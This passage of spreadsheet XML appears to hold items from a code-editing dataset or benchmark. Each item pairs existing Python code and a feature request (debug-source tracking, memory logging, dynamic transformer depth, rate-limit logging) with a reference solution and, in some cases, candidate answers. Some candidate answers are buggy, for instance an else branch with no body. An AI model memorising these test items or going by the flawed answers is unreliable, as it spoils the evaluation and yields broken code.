(settings.get(key, default_value), \'user\')\n    \n    # return default\n    return (default_value, \'default\')\n\n# #Modify - Updated debug_enabled to return source information\ndef debug_enabled(view):\n    """Check if debug is enabled and return the setting source.\n    \n    :param view: The view object.\n    :return: Tuple of (is_enabled, source) where source is \'project\', \'user\', or \'default\'.\n    """\n    value, source = get_setting_source(view, \'debug\', False)\n    return (bool(value), source)\n\n# #Modify - Updated log_debug to log the source of the debug setting\ndef log_debug(view, msg, insert_leading_line_break=False):\n    debug_info = debug_enabled(view)\n    is_enabled = debug_info[0]\n    source = debug_info[1]\n    if is_enabled:\n        source_msg = \'[source: {0}]\'.format(source)\n        _print_log(\'DEBUG\', \'{0} {1}\'.format(source_msg, msg), insert_leading_line_break)\n'}</t>
  </si>
  <si>
    <t>{'#file 1': "def get_setting(view, key, default_value=None):\n    settings = view.settings().get(PLUGIN_NAME)\n    if settings is None or settings.get(key) is None:\n        settings = sublime.load_settings(SETTINGS_FILENAME)\n    value = settings.get(key, default_value)\n    # check for project-level overrides:\n    project_value = _get_project_setting(key)\n    if project_value is None:\n        return (value, 'user')\n    return (project_value, 'project') #Modify", '#file 2': "def debug_enabled(view):\n    setting_value, setting_source = get_setting(view, 'debug', False) #Modify\n    return (bool(setting_value), setting_source) #Modify", '#file 3': "def format_debug_message(label, message, debug_enabled=False):\n    if not debug_enabled[0]: #Modify\n        return\n    header = ' {0} DEBUG - {1} '.format(PLUGIN_NAME, label)\n    horizontal_rule = repeat_str('-', len(header))\n    print('\\n{0}\\n{1}\\n{2}\\n\\n''{3}'.format(\n        horizontal_rule, header, horizontal_rule, message))\n    print('Debug setting source: {0}'.format(debug_enabled[1])) #New"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def train_for_epoch(self, epoch, args, training_set):\n        self.train()\n        acc_loss = 0\n        acc_kl_theta_loss = 0\n        cnt = 0\n        number_of_docs = torch.randperm(args.num_docs_train)\n        batch_indices = torch.split(number_of_docs, args.batch_size)\n        print("The number of the indices I am using for the training is ", len(batch_indices))\n        for idx, indices in enumerate(batch_indices):\n            print("Running for ", idx)\n            self.optimizer.zero_grad()\n            self.zero_grad()\n            data_batch = get_batch(training_set, indices, device)\n            normalized_data_batch = data_batch\n            recon_loss, kld_theta = self.forward(data_batch, normalized_data_batch)\n            total_loss = recon_loss + kld_theta\n            total_loss.backward()\n            if args.clip &gt; 0:\n                torch.nn.utils.clip_grad_norm_(self.parameters(), args.clip)\n            self.optimizer.step()\n\n            acc_loss += torch.sum(recon_loss).item()\n            acc_kl_theta_loss += torch.sum(kld_theta).item()\n            cnt += 1\n            if idx % args.log_interval == 0 and idx &gt; 0:\n                cur_loss = round(acc_loss / cnt, 2) \n                cur_kl_theta = round(acc_kl_theta_loss / cnt, 2) \n                cur_real_loss = round(cur_loss + cur_kl_theta, 2)\n\n                print(\'Epoch: {} .. batch: {}/{} .. LR: {} .. KL_theta: {} .. Rec_loss: {} .. NELBO: {}\'.format(\n                    epoch, idx, len(indices), self.optimizer.param_groups[0][\'lr\'], cur_kl_theta, cur_loss, cur_real_loss))', 'invoking_code_segment': 'for epoch in range(0, args.epochs):\n        print("I am training for epoch", epoch)\n        model.train_for_epoch(epoch, args, training_set)\n        val_ppl = model.evaluate(args, \'val\', training_set, vocab,  test_1, test_2)\n        print("The validation scores", val_ppl)', 'feature_description': 'Add a feature to log memory usage during training. This includes tracking current and peak memory usage at each epoch and batch level, displaying memory statistics during training, and storing memory metrics for analysis.', 'modified_complete_code': '# ETM/etm.py - Modified train_for_epoch method\n#Modify\nimport tracemalloc\n\nclass ETM(nn.Module):\n    # ... existing code ...\n    \n    def train_for_epoch(self, epoch, args, training_set):\n        """\n        train the model for the given epoch \n\n        Args:\n            epoch ([type]): [description]\n        """\n        #New\n        tracemalloc.start()\n        \n        self.train()\n        acc_loss = 0\n        acc_kl_theta_loss = 0\n        cnt = 0\n        number_of_docs = torch.randperm(args.num_docs_train)\n        batch_indices = torch.split(number_of_docs, args.batch_size)\n        print("The number of the indices I am using for the training is ", len(batch_indices))\n        for idx, indices in enumerate(batch_indices):\n            print("Running for ", idx)\n            self.optimizer.zero_grad()\n            self.zero_grad()\n            data_batch = get_batch(training_set, indices, device)\n            normalized_data_batch = data_batch\n            recon_loss, kld_theta = self.forward(data_batch, normalized_data_batch)\n            total_loss = recon_loss + kld_theta\n            total_loss.backward()\n            if args.clip &gt; 0:\n                torch.nn.utils.clip_grad_norm_(self.parameters(), args.clip)\n            self.optimizer.step()\n\n            acc_loss += torch.sum(recon_loss).item()\n            acc_kl_theta_loss += torch.sum(kld_theta).item()\n            cnt += 1\n            \n            #New - Log memory usage at batch level\n            if idx % args.log_interval == 0 and idx &gt; 0:\n                current, peak = tracemalloc.get_traced_memory()\n                cur_loss = round(acc_loss / cnt, 2) \n                cur_kl_theta = round(acc_kl_theta_loss / cnt, 2) \n                cur_real_loss = round(cur_loss + cur_kl_theta, 2)\n\n                print(\'Epoch: {} .. batch: {}/{} .. LR: {} .. KL_theta: {} .. Rec_loss: {} .. NELBO: {} .. Memory: {:.2f}MB (Peak: {:.2f}MB)\'.format(\n                    epoch, idx, len(indices), self.optimizer.param_groups[0][\'lr\'], cur_kl_theta, cur_loss, cur_real_loss, current / 10**6, peak / 10**6))\n\n        #New - Log memory usage at epoch level\n        current, peak = tracemalloc.get_traced_memory()\n        cur_loss = round(acc_loss / cnt, 2) \n        cur_kl_theta = round(acc_kl_theta_loss / cnt, 2) \n        cur_real_loss = round(cur_loss + cur_kl_theta, 2)\n        print(\'*\'*100)\n        print(\'Epoch-----&gt;{} .. LR: {} .. KL_theta: {} .. Rec_loss: {} .. NELBO: {} .. Memory: {:.2f}MB (Peak: {:.2f}MB)\'.format(\n                epoch, self.optimizer.param_groups[0][\'lr\'], cur_kl_theta, cur_loss, cur_real_loss, current / 10**6, peak / 10**6))\n        print(\'*\'*100)\n        \n        #New\n        tracemalloc.stop()\n\n# ETM/main.py - Modified training loop\n#Modify\nif args.mode == \'train\':\n    ## train model on data \n    best_epoch = 0\n    best_val_ppl = 1e9\n    all_val_ppls = []\n    #New\n    memory_log = []\n    \n    print(\'\\n\')\n    print(\'Visualizing model quality before training...\', args.epochs)\n    #model.visualize(args, vocabulary = vocab)\n    print(\'\\n\')\n    for epoch in range(0, args.epochs):\n        print("I am training for epoch", epoch)\n        model.train_for_epoch(epoch, args, training_set)\n        \n        #New - Log memory after each epoch\n        current, peak = tracemalloc.get_traced_memory()\n        memory_log.append({\'epoch\': epoch, \'current_mb\': current / 10**6, \'peak_mb\': peak / 10**6})\n        \n        val_ppl = model.evaluate(args, \'val\', training_set, vocab,  test_1, test_2)\n        print("The validation scores", val_ppl)\n        if val_ppl &lt; best_val_ppl:\n            with open(ckpt, \'wb\') as f:\n                torch.save(model, f)\n            best_epoch = epoch\n            best_val_ppl = val_ppl\n        else:\n            ## check whether to anneal lr\n            lr = optimizer.param_groups[0][\'lr\']\n            if args.anneal_lr and (len(all_val_ppls) &gt; args.nonmono and val_ppl &gt; min(all_val_ppls[:-args.nonmono]) and lr &gt; 1e-5):\n                optimizer.param_groups[0][\'lr\'] /= args.lr_factor\n        if epoch % args.visualize_every == 0:\n            model.visualize(args, vocabulary = vocab)\n        all_val_ppls.append(val_ppl)\n    \n    #New - Print memory summary\n    print(\'\\n\')\n    print(\'=\'*100)\n    print(\'Memory Usage Summary:\')\n    for log_entry in memory_log:\n        print(\'Epoch {}: Current: {:.2f}MB, Peak: {:.2f}MB\'.format(log_entry[\'epoch\'], log_entry[\'current_mb\'], log_entry[\'peak_mb\']))\n    print(\'=\'*100)\n    print(\'\\n\')\n    \n    with open(ckpt, \'rb\') as f:\n        model = torch.load(f)\n    model = model.to(device)\n    val_ppl = model.evaluate(args, \'val\', training_set, vocab,  test_1, test_2)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def get_batch(doc_terms_matrix, indices, device):\n    data_batch = doc_terms_matrix[indices, :]\n    data_batch = torch.from_numpy(data_batch.toarray()).float().to(device)\n    return data_batch', '#file 2': 'import tracemalloc\n\nclass ETM(nn.Module):\n    # ... (other parts of the class)\n\n    def train_for_epoch(self, epoch, args, training_set):\n        self.train()\n        acc_loss = 0\n        acc_kl_theta_loss = 0\n        cnt = 0\n        number_of_docs = torch.randperm(args.num_docs_train)\n        batch_indices = torch.split(number_of_docs, args.batch_size)\n        for idx, indices in enumerate(batch_indices):\n            self.optimizer.zero_grad()\n            self.zero_grad()\n            data_batch = get_batch(training_set, indices, device)\n            normalized_data_batch = data_batch\n            recon_loss, kld_theta = self.forward(data_batch, normalized_data_batch)\n            total_loss = recon_loss + kld_theta\n            total_loss.backward()\n            if args.clip &gt; 0:\n                torch.nn.utils.clip_grad_norm_(self.parameters(), args.clip)\n            self.optimizer.step()\n            acc_loss += torch.sum(recon_loss).item()\n            acc_kl_theta_loss += torch.sum(kld_theta).item()\n            cnt += 1\n        # Modify: Log memory usage at the end of each epoch\n        current, peak = tracemalloc.get_traced_memory()\n        print(f"Epoch {epoch} memory usage: Current {current / 10**6}MB; Peak {peak / 10**6}MB")', '#file 3': 'import tracemalloc\n\n# ... (other parts of the script)\n\ntracemalloc.start()\nif args.mode == \'train\':\n    # ... (other parts of the training loop)\n    for epoch in range(0, args.epochs):\n        model.train_for_epoch(epoch, args, training_set)\n        # ... (other parts of the training loop)\nelse:\n    # ... (other parts of the evaluation loop)\n\ncurrent, peak = tracemalloc.get_traced_memory()\nprint(f"Current memory usage is {current / 10**6}MB; Peak was {peak / 10**6}MB")\ntracemalloc.stop()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'T2T_ViT_Ghost class __init__ method and T2t_vit_16_ghost function', 'invoking_code_segment': 'create_model call in transfer_learning.py that instantiates the model with img_size parameter', 'feature_description': 'Add a feature to allow the model to dynamically adjust the number of layers in the transformer blocks based on the input image size. Smaller images use fewer layers for efficiency, while larger images use more layers for better feature extraction.', 'modified_complete_code': "# File 1: EANet/EAMLP/models/t2t_vit_ghost.py\n# Modify the T2T_ViT_Ghost class __init__ method:\n\nclass T2T_ViT_Ghost(nn.Module):\n    def __init__(self, img_size=224, tokens_type='performer', in_chans=3, num_classes=1000, embed_dim=768, depth=12,\n                 num_heads=12, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop_rate=0., attn_drop_rate=0.,\n                 drop_path_rate=0., norm_layer=nn.LayerNorm, dynamic_depth=False):\n        super().__init__()\n        self.num_classes = num_classes\n        self.num_features = self.embed_dim = embed_dim\n        self.img_size = img_size\n        self.dynamic_depth = dynamic_depth\n        \n        # New: Calculate dynamic depth based on image size\n        if dynamic_depth:\n            depth = self._calculate_dynamic_depth(img_size, base_depth=depth)\n        \n        self.tokens_to_token = T2T_module(\n                img_size=img_size, tokens_type=tokens_type, in_chans=in_chans, embed_dim=embed_dim)\n        num_patches = self.tokens_to_token.num_patches\n\n        self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))\n        self.pos_embed = nn.Parameter(data=get_sinusoid_encoding(n_position=num_patches + 1, d_hid=embed_dim), requires_grad=False)\n        self.pos_drop = nn.Dropout(p=drop_rate)\n\n        dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)]\n        self.blocks = nn.ModuleList([\n            Block(\n                dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,\n                drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)\n            for i in range(depth)])\n        self.norm = norm_layer(embed_dim)\n\n        self.head = nn.Linear(embed_dim, num_classes) if num_classes &gt; 0 else nn.Identity()\n\n        trunc_normal_(self.cls_token, std=.02)\n        self.apply(self._init_weights)\n    \n    # New: Method to calculate dynamic depth based on image size\n    def _calculate_dynamic_depth(self, img_size, base_depth=16):\n        if img_size &lt;= 128:\n            return max(4, base_depth // 4)\n        elif img_size &lt;= 192:\n            return max(8, base_depth // 2)\n        elif img_size &lt;= 256:\n            return base_depth\n        else:\n            return int(base_depth * 1.5)\n\n    def _init_weights(self, m):\n        if isinstance(m, nn.Linear):\n            trunc_normal_(m.weight, std=.02)\n            if isinstance(m, nn.Linear) and m.bias is not None:\n                nn.init.constant_(m.bias, 0)\n        elif isinstance(m, nn.LayerNorm):\n            nn.init.constant_(m.bias, 0)\n            nn.init.constant_(m.weight, 1.0)\n\n    @torch.jit.ignore\n    def no_weight_decay(self):\n        return {'cls_token'}\n\n    def get_classifier(self):\n        return self.head\n\n    def reset_classifier(self, num_classes, global_pool=''):\n        self.num_classes = num_classes\n        self.head = nn.Linear(self.embed_dim, num_classes) if num_classes &gt; 0 else nn.Identity()\n\n    def forward_features(self, x):\n        B = x.shape[0]\n        x = self.tokens_to_token(x)\n\n        cls_tokens = self.cls_token.expand(B, -1, -1)\n        x = torch.cat((cls_tokens, x), dim=1)\n        x = x + self.pos_embed\n        x = self.pos_drop(x)\n\n        for blk in self.blocks:\n            x = blk(x)\n\n        x = self.norm(x)\n        return x[:, 0]\n\n    def forward(self, x):\n        x = self.forward_features(x)\n        x = self.head(x)\n        return x\n\n# Modify the T2t_vit_16_ghost function:\n@register_model\ndef T2t_vit_16_ghost(pretrained=False, dynamic_depth=False, **kwargs):\n    if pretrained:\n        kwargs.setdefault('qk_scale', 384 ** -0.5)\n    # Modify: Add dynamic_depth parameter\n    model = T2T_ViT_Ghost(tokens_type='performer', embed_dim=384, depth=16, num_heads=6, mlp_ratio=3., dynamic_depth=dynamic_depth, **kwargs)\n    model.default_cfg = default_cfgs['T2t_vit_16_ghost']\n    if pretrained:\n        load_pretrained(\n            model, num_classes=model.num_classes, in_chans=kwargs.get('in_chans', 3))\n    return model\n\n# File 2: EANet/EAMLP/transfer_learning.py\n# Modify the argument parser to add dynamic_depth option:\nparser.add_argument('--dynamic-depth', action='store_true', default=False,\n                    help='Enable dynamic depth adjustment based on image size')\n\n# Modify the model creation section:\nprint('==&gt; Building model..')\nnet = create_model(\n    args.model,\n    pretrained=args.pretrained,\n    num_classes=args.num_classes,\n    drop_rate=args.drop,\n    drop_connect_rate=args.drop_connect, \n    drop_path_rate=args.drop_path,\n    drop_block_rate=args.drop_block,\n    global_pool=args.gp,\n    bn_tf=args.bn_tf,\n    bn_momentum=args.bn_momentum,\n    bn_eps=args.bn_eps,\n    checkpoint_path=args.initial_checkpoint,\n    img_size=args.img_size,\n    dynamic_depth=args.dynamic_depth)  # New: Pass dynamic_depth parameter"}</t>
  </si>
  <si>
    <t>{'#file 1': "class T2T_ViT_Ghost(nn.Module):\n    def __init__(self, img_size=224, tokens_type='performer', in_chans=3, num_classes=1000, embed_dim=768, depth=12,\n                 num_heads=12, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop_rate=0., attn_drop_rate=0.,\n                 drop_path_rate=0., norm_layer=nn.LayerNorm, dynamic_depth=False):\n        super().__init__()\n        self.num_classes = num_classes\n        self.num_features = self.embed_dim = embed_dim  # num_features for consistency with other models\n\n        self.tokens_to_token = T2T_module(\n                img_size=img_size, tokens_type=tokens_type, in_chans=in_chans, embed_dim=embed_dim)\n        num_patches = self.tokens_to_token.num_patches\n\n        self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))\n        self.pos_embed = nn.Parameter(data=get_sinusoid_encoding(n_position=num_patches + 1, d_hid=embed_dim), requires_grad=False)\n        self.pos_drop = nn.Dropout(p=drop_rate)\n\n        if dynamic_depth:\n            depth = max(1, int(depth * (img_size / 224)))\n\n        dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)]  # stochastic depth decay rule\n        self.blocks = nn.ModuleList([Block(\n                dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,\n                drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)\n            for i in range(depth)])\n        self.norm = norm_layer(embed_dim)\n\n        # Classifier head\n        self.head = nn.Linear(embed_dim, num_classes) if num_classes &gt; 0 else nn.Identity()\n\n        trunc_normal_(self.cls_token, std=.02)\n        self.apply(self._init_weights)", '#file 2': "@register_model\ndef T2t_vit_16_ghost(pretrained=False, **kwargs):\n    if pretrained:\n        kwargs.setdefault('qk_scale', 384 ** -0.5)\n    model = T2T_ViT_Ghost(tokens_type='performer', embed_dim=384, depth=16, num_heads=6, mlp_ratio=3., dynamic_depth=True, **kwargs)\n    model.default_cfg = default_cfgs['T2t_vit_16_ghost']\n    if pretrained:\n        load_pretrained(\n            model, num_classes=model.num_classes, in_chans=kwargs.get('in_chans', 3))\n    return model", '#file 3': 'net = create_model(\n    args.model,\n    pretrained=args.pretrained,\n    num_classes=args.num_classes,\n    drop_rate=args.drop,\n    drop_connect_rate=args.drop_connect, \n    drop_path_rate=args.drop_path,\n    drop_block_rate=args.drop_block,\n    global_pool=args.gp,\n    bn_tf=args.bn_tf,\n    bn_momentum=args.bn_momentum,\n    bn_eps=args.bn_eps,\n    checkpoint_path=args.initial_checkpoint,\n    img_size=args.img_size,\n    dynamic_depth=True  # New parameter\n)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'RateLimiter.__call__ method and WebSocketRateLimiter.__call__ method in fastapi_limiter/depends.py', 'invoking_code_segment': 'Route dependencies in examples/main.py and websocket_endpoint function calling ratelimit(websocket, context_key=data)', 'feature_description': 'Add logging for rate limit exceeded events to track when rate limits are triggered, including request details, rate limit parameters, and timestamp information', 'modified_complete_code': '# fastapi_limiter/depends.py\nfrom typing import Annotated, Callable, Optional\nimport logging\n\nimport redis as pyredis\nfrom pydantic import Field\nfrom starlette.requests import Request\nfrom starlette.responses import Response\nfrom starlette.websockets import WebSocket\n\nfrom fastapi_limiter import FastAPILimiter\n\n# New: Initialize logger for rate limit events\nlogger = logging.getLogger(__name__)\n\nclass RateLimiter:\n    def __init__(\n        self,\n        times: Annotated[int, Field(ge=0)] = 1,\n        milliseconds: Annotated[int, Field(ge=-1)] = 0,\n        seconds: Annotated[int, Field(ge=-1)] = 0,\n        minutes: Annotated[int, Field(ge=-1)] = 0,\n        hours: Annotated[int, Field(ge=-1)] = 0,\n        identifier: Optional[Callable] = None,\n        callback: Optional[Callable] = None,\n    ):\n        self.times = times\n        self.milliseconds = milliseconds + 1000 * seconds + 60000 * minutes + 3600000 * hours\n        self.identifier = identifier\n        self.callback = callback\n\n    async def _check(self, key):\n        redis = FastAPILimiter.redis\n        pexpire = await redis.evalsha(\n            FastAPILimiter.lua_sha, 1, key, str(self.times), str(self.milliseconds)\n        )\n        return pexpire\n\n    async def __call__(self, request: Request, response: Response):\n        if not FastAPILimiter.redis:\n            raise Exception("You must call FastAPILimiter.init in startup event of fastapi!")\n        route_index = 0\n        dep_index = 0\n        for i, route in enumerate(request.app.routes):\n            if route.path == request.scope["path"] and request.method in route.methods:\n                route_index = i\n                for j, dependency in enumerate(route.dependencies):\n                    if self is dependency.dependency:\n                        dep_index = j\n                        break\n\n        identifier = self.identifier or FastAPILimiter.identifier\n        callback = self.callback or FastAPILimiter.http_callback\n        rate_key = await identifier(request)\n        key = f"{FastAPILimiter.prefix}:{rate_key}:{route_index}:{dep_index}"\n        try:\n            pexpire = await self._check(key)\n        except pyredis.exceptions.NoScriptError:\n            FastAPILimiter.lua_sha = await FastAPILimiter.redis.script_load(\n                FastAPILimiter.lua_script\n            )\n            pexpire = await self._check(key)\n        # Modify: Add logging when rate limit is exceeded\n        if pexpire != 0:\n            logger.warning(\n                f"Rate limit exceeded for {request.method} {request.url.path} | "\n                f"Client: {rate_key} | Limit: {self.times} requests per {self.milliseconds}ms | "\n                f"Retry after: {pexpire}ms"\n            )\n            return await callback(request, response, pexpire)\n\n\nclass WebSocketRateLimiter(RateLimiter):\n    async def __call__(self, ws: WebSocket, context_key=""):\n        if not FastAPILimiter.redis:\n            raise Exception("You must call FastAPILimiter.init in startup event of fastapi!")\n        identifier = self.identifier or FastAPILimiter.identifier\n        rate_key = await identifier(ws)\n        key = f"{FastAPILimiter.prefix}:ws:{rate_key}:{context_key}"\n        pexpire = await self._check(key)\n        callback = self.callback or FastAPILimiter.ws_callback\n        # Modify: Add logging when rate limit is exceeded for WebSocket\n        if pexpire != 0:\n            logger.warning(\n                f"WebSocket rate limit exceeded | Client: {rate_key} | "\n                f"Context: {context_key} | Limit: {self.times} requests per {self.milliseconds}ms | "\n                f"Retry after: {pexpire}ms"\n            )\n            return await callback(ws, pexpire)\n\n# examples/main.py\nfrom contextlib import asynccontextmanager\nimport logging\n\nimport redis.asyncio as redis\nimport uvicorn\nfrom fastapi import Depends, FastAPI, HTTPException, WebSocket\n\nfrom fastapi_limiter import FastAPILimiter\nfrom fastapi_limiter.depends import RateLimiter, WebSocketRateLimiter\n\n# New: Configure logging for rate limit events\nlogging.basicConfig(\n    level=logging.INFO,\n    format=\'%(asctime)s - %(name)s - %(levelname)s - %(message)s\'\n)\n\n@asynccontextmanager\nasync def lifespan(_: FastAPI):\n    redis_connection = redis.from_url("redis://localhost:6379", encoding="utf8")\n    await FastAPILimiter.init(redis_connection)\n    yield\n    await FastAPILimiter.close()\n\n\napp = FastAPI(lifespan=lifespan)\n\n\n@app.get("/", dependencies=[Depends(RateLimiter(times=2, seconds=5))])\nasync def index_get():\n    return {"msg": "Hello World"}\n\n\n@app.post("/", dependencies=[Depends(RateLimiter(times=1, seconds=5))])\nasync def index_post():\n    return {"msg": "Hello World"}\n\n\n@app.get(\n    "/multiple",\n    dependencies=[\n        Depends(RateLimiter(times=1, seconds=5)),\n        Depends(RateLimiter(times=2, seconds=15)),\n    ],\n)\nasync def multiple():\n    return {"msg": "Hello World"}\n\n\n@app.websocket("/ws")\nasync def websocket_endpoint(websocket: WebSocket):\n    await websocket.accept()\n    ratelimit = WebSocketRateLimiter(times=1, seconds=5)\n    while True:\n        try:\n            data = await websocket.receive_text()\n            await ratelimit(websocket, context_key=data)\n            await websocket.send_text("Hello, world")\n        except HTTPException:\n            await websocket.send_text("Hello again")\n\n\nif __name__ == "__main__":\n    uvicorn.run("main:app", debug=True, reload=True)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'async def _check(self, key):\n    redis = FastAPILimiter.redis\n    pexpire = await redis.evalsha(\n        FastAPILimiter.lua_sha, 1, key, str(self.times), str(self.milliseconds)\n    )\n    if pexpire != 0:\n        print(f"Rate limit exceeded for key: {key}, pexpire: {pexpire}")  # Modify\n    return pexpire', '#file 2': 'async def __call__(self, request: Request, response: Response):\n    ...\n    pexpire = await self._check(key)\n    ...\n    if pexpire != 0:\n        print(f"Rate limit exceeded for request: {request.url}, pexpire: {pexpire}")  # Modify\n        return await callback(request, response, pexpire)\n\nasync def __call__(self, ws: WebSocket, context_key=""):\n    ...\n    pexpire = await self._check(key)\n    callback = self.callback or FastAPILimiter.ws_callback\n    if pexpire != 0:\n        print(f"Rate limit exceeded for WebSocket, pexpire: {pexpire}")  # Modify\n        return await callback(ws, pexpire)', '#file 3': 'async def websocket_endpoint(websocket: WebSocket):\n    await websocket.accept()\n    ratelimit = WebSocketRateLimiter(times=1, seconds=5)\n    while True:\n        try:\n            data = await websocket.receive_text()\n            await ratelimit(websocket, context_key=data)  # NB: context_key is optional\n            await websocket.send_text("Hello, world")\n        except HTTPException as e:\n            print(f"Rate limit exceeded in WebSocket: {e}")  # Modify\n            await websocket.send_text("Hello again")'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'create_model_and_diffusion() function in script_util.py that creates and returns model and diffusion objects', 'invoking_code_segment': 'main() function in image_train.py that calls create_model_and_diffusion() and uses the returned model and diffusion objects', 'feature_description': 'Add logging functionality to track the model and diffusion creation process, including logging when model and diffusion are created, their configuration parameters, and key properties like number of timesteps and model architecture details.', 'modified_complete_code': '# Modified script_util.py\nimport argparse\nimport inspect\nimport logging\n\nfrom . import gaussian_diffusion as gd\nfrom .respace import SpacedDiffusion, space_timesteps\nfrom .unet import SuperResModel, UNetModel\n\n# New: Setup logger for this module\nlogger = logging.getLogger(__name__)\n\nNUM_CLASSES = 1000\n\ndef model_and_diffusion_defaults():\n    """Defaults for image training."""\n    return dict(\n        image_size=64,\n        num_channels=128,\n        num_res_blocks=2,\n        num_heads=4,\n        num_heads_upsample=-1,\n        attention_resolutions="16,8",\n        dropout=0.0,\n        learn_sigma=False,\n        sigma_small=False,\n        class_cond=False,\n        diffusion_steps=1000,\n        noise_schedule="linear",\n        timestep_respacing="",\n        use_kl=False,\n        predict_xstart=False,\n        rescale_timesteps=True,\n        rescale_learned_sigmas=True,\n        use_checkpoint=False,\n        use_scale_shift_norm=True,\n    )\n\n# Modify: Add logging to create_model_and_diffusion\ndef create_model_and_diffusion(\n    image_size,\n    class_cond,\n    learn_sigma,\n    sigma_small,\n    num_channels,\n    num_res_blocks,\n    num_heads,\n    num_heads_upsample,\n    attention_resolutions,\n    dropout,\n    diffusion_steps,\n    noise_schedule,\n    timestep_respacing,\n    use_kl,\n    predict_xstart,\n    rescale_timesteps,\n    rescale_learned_sigmas,\n    use_checkpoint,\n    use_scale_shift_norm,\n):\n    # New: Log model creation parameters\n    logger.info("Creating model with parameters:")\n    logger.info(f"  image_size={image_size}, num_channels={num_channels}, num_res_blocks={num_res_blocks}")\n    logger.info(f"  num_heads={num_heads}, attention_resolutions={attention_resolutions}")\n    logger.info(f"  dropout={dropout}, class_cond={class_cond}, use_checkpoint={use_checkpoint}")\n    \n    model = create_model(\n        image_size,\n        num_channels,\n        num_res_blocks,\n        learn_sigma=learn_sigma,\n        class_cond=class_cond,\n        use_checkpoint=use_checkpoint,\n        attention_resolutions=attention_resolutions,\n        num_heads=num_heads,\n        num_heads_upsample=num_heads_upsample,\n        use_scale_shift_norm=use_scale_shift_norm,\n        dropout=dropout,\n    )\n    \n    # New: Log diffusion creation parameters\n    logger.info("Creating diffusion with parameters:")\n    logger.info(f"  diffusion_steps={diffusion_steps}, noise_schedule={noise_schedule}")\n    logger.info(f"  learn_sigma={learn_sigma}, sigma_small={sigma_small}")\n    logger.info(f"  use_kl={use_kl}, predict_xstart={predict_xstart}")\n    logger.info(f"  rescale_timesteps={rescale_timesteps}, rescale_learned_sigmas={rescale_learned_sigmas}")\n    logger.info(f"  timestep_respacing={timestep_respacing}")\n    \n    diffusion = create_gaussian_diffusion(\n        steps=diffusion_steps,\n        learn_sigma=learn_sigma,\n        sigma_small=sigma_small,\n        noise_schedule=noise_schedule,\n        use_kl=use_kl,\n        predict_xstart=predict_xstart,\n        rescale_timesteps=rescale_timesteps,\n        rescale_learned_sigmas=rescale_learned_sigmas,\n        timestep_respacing=timestep_respacing,\n    )\n    \n    # New: Log successful creation\n    logger.info(f"Model and diffusion created successfully. Model type: {type(model).__name__}, Diffusion type: {type(diffusion).__name__}")\n    \n    return model, diffusion\n\ndef create_model(\n    image_size,\n    num_channels,\n    num_res_blocks,\n    learn_sigma,\n    class_cond,\n    use_checkpoint,\n    attention_resolutions,\n    num_heads,\n    num_heads_upsample,\n    use_scale_shift_norm,\n    dropout,\n):\n    if image_size == 256:\n        channel_mult = (1, 1, 2, 2, 4, 4)\n    elif image_size == 64:\n        channel_mult = (1, 2, 3, 4)\n    elif image_size == 32:\n        channel_mult = (1, 2, 2, 2)\n    else:\n        raise ValueError(f"unsupported image size: {image_size}")\n\n    attention_ds = []\n    for res in attention_resolutions.split(","):\n        attention_ds.append(image_size // int(res))\n\n    return UNetModel(\n        in_channels=3,\n        model_channels=num_channels,\n        out_channels=(3 if not learn_sigma else 6),\n        num_res_blocks=num_res_blocks,\n        attention_resolutions=tuple(attention_ds),\n        dropout=dropout,\n        channel_mult=channel_mult,\n        num_classes=(NUM_CLASSES if class_cond else None),\n        use_checkpoint=use_checkpoint,\n        num_heads=num_heads,\n        num_heads_upsample=num_heads_upsample,\n        use_scale_shift_norm=use_scale_shift_norm,\n    )\n\ndef sr_model_and_diffusion_defaults():\n    res = model_and_diffusion_defaults()\n    res["large_size"] = 256\n    res["small_size"] = 64\n    arg_names = inspect.getfullargspec(sr_create_model_and_diffusion)[0]\n    for k in res.copy().keys():\n        if k not in arg_names:\n            del res[k]\n    return res\n\ndef sr_create_model_and_diffusion(\n    large_size,\n    small_size,\n    class_cond,\n    learn_sigma,\n    num_channels,\n    num_res_blocks,\n    num_heads,\n    num_heads_upsample,\n    attention_resolutions,\n    dropout,\n    diffusion_steps,\n    noise_schedule,\n    timestep_respacing,\n    use_kl,\n    predict_xstart,\n    rescale_timesteps,\n    rescale_learned_sigmas,\n    use_checkpoint,\n    use_scale_shift_norm,\n):\n    model = sr_create_model(\n        large_size,\n        small_size,\n        num_channels,\n        num_res_blocks,\n        learn_sigma=learn_sigma,\n        class_cond=class_cond,\n        use_checkpoint=use_checkpoint,\n        attention_resolutions=attention_resolutions,\n        num_heads=num_heads,\n        num_heads_upsample=num_heads_upsample,\n        use_scale_shift_norm=use_scale_shift_norm,\n        dropout=dropout,\n    )\n    diffusion = create_gaussian_diffusion(\n        steps=diffusion_steps,\n        learn_sigma=learn_sigma,\n        noise_schedule=noise_schedule,\n        use_kl=use_kl,\n        predict_xstart=predict_xstart,\n        rescale_timesteps=rescale_timesteps,\n        rescale_learned_sigmas=rescale_learned_sigmas,\n        timestep_respacing=timestep_respacing,\n    )\n    return model, diffusion\n\ndef sr_create_model(\n    large_size,\n    small_size,\n    num_channels,\n    num_res_blocks,\n    learn_sigma,\n    class_cond,\n    use_checkpoint,\n    attention_resolutions,\n    num_heads,\n    num_heads_upsample,\n    use_scale_shift_norm,\n    dropout,\n):\n    _ = small_size\n    if large_size == 256:\n        channel_mult = (1, 1, 2, 2, 4, 4)\n    elif large_size == 64:\n        channel_mult = (1, 2, 3, 4)\n    else:\n        raise ValueError(f"unsupported large size: {large_size}")\n\n    attention_ds = []\n    for res in 